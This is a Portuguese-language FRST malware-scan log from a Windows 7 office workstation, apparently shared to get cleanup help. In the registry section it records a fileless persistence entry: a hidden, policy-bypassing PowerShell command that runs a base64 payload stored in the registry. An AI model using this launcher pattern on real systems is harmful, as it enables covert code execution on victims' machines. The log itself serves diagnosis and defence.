cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão:05-06-2016 02
Executado por Estação 01 (administrador) em ESTAÇÃO01-PC (06-06-2016 12:36:46)
Executando a partir de C:\Users\Estação 01\Downloads
Perfis Carregados: Estação 01 (Perfis Disponíveis: Estação 01)
Platform: Windows 7 Ultimate (X64) Idioma: Português (Brasil)
Internet Explorer Versão 8 (Navegador padrão: FF)
Modo da Inicialização: Normal
Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processos (Whitelisted) =================

(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdc.exe
(Garmin Ltd. or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(VIA) C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Autodesk, Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler64.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brother Help\BrotherHelp.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Garmin Ltd. or its subsidiaries) C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe
(SafeNet Inc.) C:\Windows\System32\hasplms.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\My Avira\Avira.OE.ServiceHost.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\My Avira\Avira.OE.Systray.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\tv_x64.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Google) C:\Program Files (x86)\Google\Google Earth\client\googleearth.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office15\EXCEL.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(char *Pointer Informática) C:\Tg98SE\Tg.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registro (Whitelisted) ===========================

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)

HKLM\...\Run: [Windows Mobile Device Center] => C:\Windows\WindowsMobile\wmdc.exe [660360 2007-05-31] (Microsoft Corporation)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [5015040 2012-02-09] (VIA)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5515496 2015-07-02] (Avast Software s.r.o.)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [716224 2016-03-23] (Autodesk, Inc.)
HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\My Avira\Avira.OE.Systray.exe [129272 2015-03-16] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139264 2013-04-08] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [4522496 2013-03-22] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrHelp] => C:\Program Files (x86)\Brother\Brother Help\BrotherHelp.exe [1944576 2013-03-07] (Brother Industries, Ltd.)
HKU\S-1-5-21-2604395359-1916096822-1890066690-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1399208 2016-04-08] (Garmin Ltd. or its subsidiaries)
HKU\S-1-5-21-2604395359-1916096822-1890066690-1000\...\Run: [{2E31CAA3-174A-4B27-87CE-B0ABBFBB3E4E}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\VHMJMLDEKGJD').UOCPRMXPEQORF)));
HKU\S-1-5-21-2604395359-1916096822-1890066690-1000\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-21-2604395359-1916096822-1890066690-1000\...\Policies\Explorer: []
HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1399208 2016-04-08] (Garmin Ltd. or its subsidiaries)
HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2015-07-02] (Avast Software s.r.o.)
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2016-02-07] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Estação 01\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Estação 01\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Estação 01\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Estação 01\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Estação 01\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Estação 01\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Estação 01\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Estação 01\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll [2013-09-10] (Dropbox, Inc.)
CHR HKLM\SOFTWARE\Policies\Google: Restrição <======= ATENÇÃO

==================== Internet (Whitelisted) ====================

(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)

Tcpip\Parameters: [DhcpNameServer] 192.168.25.1
Tcpip\..\Interfaces\{0857742C-6E4C-4556-95AD-0B856BEC4763}: [DhcpNameServer] 192.168.25.1
Tcpip\..\Interfaces\{753B2CB3-0A09-42E4-A1AC-18BF7A0BE0AB}: [DhcpNameServer] 10.0.0.3

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2015-07-02] (Avast Software s.r.o.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll => Nenhum Arquivo
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2015-07-02] (Avast Software s.r.o.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\PROGRA~2\MICROS~1\Office15\URLREDIR.DLL => Nenhum Arquivo
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2012-10-01] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-13] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-13] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-13] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-13] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Estação 01\AppData\Roaming\Mozilla\Firefox\Profiles\96g1bfnb.default
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-11] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-11] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-05-27] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2012-10-01] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-05-27] (Adobe Systems Inc.)
FF Extension: Skype - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-12-10]

Chrome:
=======
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\50.0.2661.102\ppGoogleNaClPluginChrome.dll => Nenhum Arquivo
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\50.0.2661.102\pdf.dll => Nenhum Arquivo
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\50.0.2661.102\gcswf32.dll => Nenhum Arquivo
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => Nenhum Arquivo
CHR Plugin: (Microsoft Office 2013) - C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2013) - C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.99\npGoogleUpdate3.dll => Nenhum Arquivo
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
CHR Profile: C:\Users\Estação 01\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (YouTube) - C:\Users\Estação 01\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25]
CHR Extension: (Adblock Plus) - C:\Users\Estação 01\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-06-01]
CHR Extension: (Google Search) - C:\Users\Estação 01\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Segurança do navegador Avira) - C:\Users\Estação 01\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2016-05-13]
CHR Extension: (Avast Online Security) - C:\Users\Estação 01\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-06-06]
CHR Extension: (Skype) - C:\Users\Estação 01\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-05-24]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Estação 01\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-05]
CHR Extension: (Gmail) - C:\Users\Estação 01\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-31]
CHR HKLM\...\Chrome\Extension: [aaaajpjcfehonfdgjjnbcbenifanaofn] - C:\ProgramData\AskPartnerNetwork\Toolbar\ARS3-V7\CRX\ToolbarCR.crx
CHR HKLM-x32\...\Chrome\Extension: [aaaajpjcfehonfdgjjnbcbenifanaofn] - C:\ProgramData\AskPartnerNetwork\Toolbar\ARS3-V7\CRX\ToolbarCR.crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-07-02]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

==================== Serviços (Whitelisted) ========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1231376 2016-03-23] (Autodesk Inc.)
S2 Autodesk Content Service; C:\Program Files (x86)\Autodesk\Content Service\Connect.Service.ContentService.exe [31192 2014-02-07] (Autodesk, Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-07-02] (Avast Software s.r.o.)
R2 Avira.OE.ServiceHost; C:\Program Files (x86)\Avira\My Avira\Avira.OE.ServiceHost.exe [201008 2015-03-16] (Avira Operations GmbH & Co. KG)
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [282112 2012-10-26] (Brother Industries, Ltd.) [Arquivo não assinado]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [792592 2016-04-08] (Garmin Ltd. or its subsidiaries)
R2 hasplms; C:\Windows\system32\hasplms.exe [4683144 2014-07-15] (SafeNet Inc.)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [166720 2012-06-25] (Intel Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5702416 2015-09-11] (TeamViewer GmbH)
R2 VIAKaraokeService; C:\Windows\system32\viakaraokesrv.exe [27760 2011-11-11] (VIA Technologies, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

R3 akshasp; C:\Windows\System32\DRIVERS\akshasp.sys [60488 2013-08-01] (SafeNet Inc.)
R3 akshhl; C:\Windows\System32\DRIVERS\akshhl.sys [63944 2013-08-01] (SafeNet Inc.)
R3 aksusb; C:\Windows\System32\DRIVERS\aksusb.sys [303624 2013-08-01] (SafeNet Inc.)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29168 2015-07-02] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [89944 2015-07-02] (Avast Software s.r.o.)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2015-07-02] (Avast Software s.r.o.)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65736 2015-07-02] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1047320 2015-07-02] (Avast Software s.r.o.)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [442264 2015-07-02] (Avast Software s.r.o.)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [137288 2015-07-02] (Avast Software s.r.o.)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [272248 2015-07-02] ()
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R2 hardlock; C:\Windows\system32\drivers\hardlock.sys [331608 2014-07-15] (SafeNet Inc.)
R3 netr28x; C:\Windows\System32\DRIVERS\Dnetr28x.sys [925536 2010-04-22] (Ralink Technology, Corp.)
S2 Proteq; C:\Windows\SysWow64\Drivers\Proteq.sys [10848 1999-07-06] (PROTEQ)

==================== NetSvcs (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


==================== Um Mês Criados arquivos e pastas ========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2016-06-06 11:56 - 2016-06-06 12:31 - 00060927 _____ C:\Users\Estação 01\Downloads\Addition.txt
2016-06-06 11:55 - 2016-06-06 12:36 - 00023052 _____ C:\Users\Estação 01\Downloads\FRST.txt
2016-06-06 11:55 - 2016-06-06 12:36 - 00000000 ____D C:\FRST
2016-06-06 11:55 - 2016-06-06 11:55 - 02384896 _____ (Farbar) C:\Users\Estação 01\Downloads\FRST64.exe
2016-06-06 11:52 - 2016-06-06 11:52 - 01034556 _____ C:\Users\Estação 01\Downloads\Windows6.1-KB2999226-x64.msu
2016-06-06 11:32 - 2016-06-06 11:32 - 00009439 _____ C:\Users\Estação 01\Downloads\POBRE JUAN LOC NOVO MF.xlsx
2016-06-06 11:32 - 2016-06-06 11:32 - 00000165 ____H C:\Users\Estação 01\Downloads\~$POBRE JUAN LOC NOVO MF.xlsx
2016-06-06 10:27 - 2016-06-06 10:27 - 00779806 _____ C:\Users\Estação 01\Downloads\Outlook.com (11).zip
2016-06-06 10:21 - 2016-06-06 10:21 - 00298414 _____ C:\Users\Estação 01\Downloads\DOC_FENELON_REMEMBR_R00.dwg
2016-06-06 09:13 - 2016-06-06 09:13 - 07153120 _____ C:\Users\Estação 01\Downloads\VERONA+LEV_LAUDOS.dwg
2016-06-06 08:30 - 2016-06-06 08:30 - 00002003 _____ C:\Users\Public\Desktop\A360 Desktop.lnk
2016-06-06 08:26 - 2016-06-06 08:26 - 00000000 ____D C:\Windows\FD1EA552EF9D4A44AFFCAF6FEC18F317.TMP
2016-06-06 08:24 - 2016-06-06 08:24 - 00000000 ____D C:\Windows\6AB939243A5E4E678E6BEDF00F7C7058.TMP
2016-06-06 08:23 - 2016-06-06 08:23 - 00002328 _____ C:\Users\Public\Desktop\Civil 3D 2017 Imperial.lnk
2016-06-06 08:23 - 2016-06-06 08:23 - 00002322 _____ C:\Users\Public\Desktop\Civil 3D 2017 Metric.lnk
2016-06-06 08:13 - 2016-06-06 08:14 - 00000000 ____D C:\Program Files (x86)\AutoCAD 2017
2016-06-03 15:15 - 2016-06-03 15:15 - 00669146 _____ C:\Users\Estação 01\Downloads\Outlook.com (10).zip
2016-06-03 14:43 - 2016-06-06 07:39 - 00000000 ____D C:\Users\Estação 01\Downloads\Autodesk_AutoCAD_Civil_3D_2017
2016-06-03 14:07 - 2016-06-03 14:07 - 00292446 _____ C:\Users\Estação 01\Downloads\VITORIA.dwg
2016-06-03 13:49 - 2016-06-03 13:49 - 00810860 _____ C:\Users\Estação 01\Downloads\Outlook.com (9).zip
2016-06-03 13:48 - 2016-06-03 13:48 - 02103159 _____ C:\Users\Estação 01\Downloads\Outlook.com (8).zip
2016-06-03 09:03 - 2016-06-03 09:03 - 03261960 _____ C:\Users\Estação 01\Downloads\topografia x arquitetura R01.dwg
2016-06-03 09:03 - 2016-06-03 09:03 - 01352192 _____ C:\Users\Estação 01\Downloads\topografia x arquitetura R01.bak
2016-06-03 08:35 - 2016-06-03 08:35 - 01053615 _____ C:\Users\Estação 01\Downloads\00750820.16o.pdf
2016-06-03 08:11 - 2016-06-03 08:12 - 00412254 _____ C:\Users\Estação 01\Downloads\Outlook.com (7).zip
2016-06-02 15:22 - 2016-06-02 15:22 - 00457050 _____ C:\Users\Estação 01\Downloads\LEV ESPELHO REPRESA - LUZIA MONTEIRO.zip
2016-06-02 15:18 - 2016-06-02 15:18 - 00161118 _____ C:\Users\Estação 01\Downloads\fwluiza_monteiro_lev_area_parque.zip
2016-06-02 11:21 - 2016-06-02 11:21 - 00000221 ____H C:\Users\Estação 01\Downloads\Levantamento Planialtimétrico (5).dwl2
2016-06-02 11:21 - 2016-06-02 11:21 - 00000067 ____H C:\Users\Estação 01\Downloads\Levantamento Planialtimétrico (5).dwl
2016-06-02 10:16 - 2016-06-02 10:16 - 00004520 _____ C:\Users\Estação 01\Desktop\Levantamento Planialtimétrico (5).kml
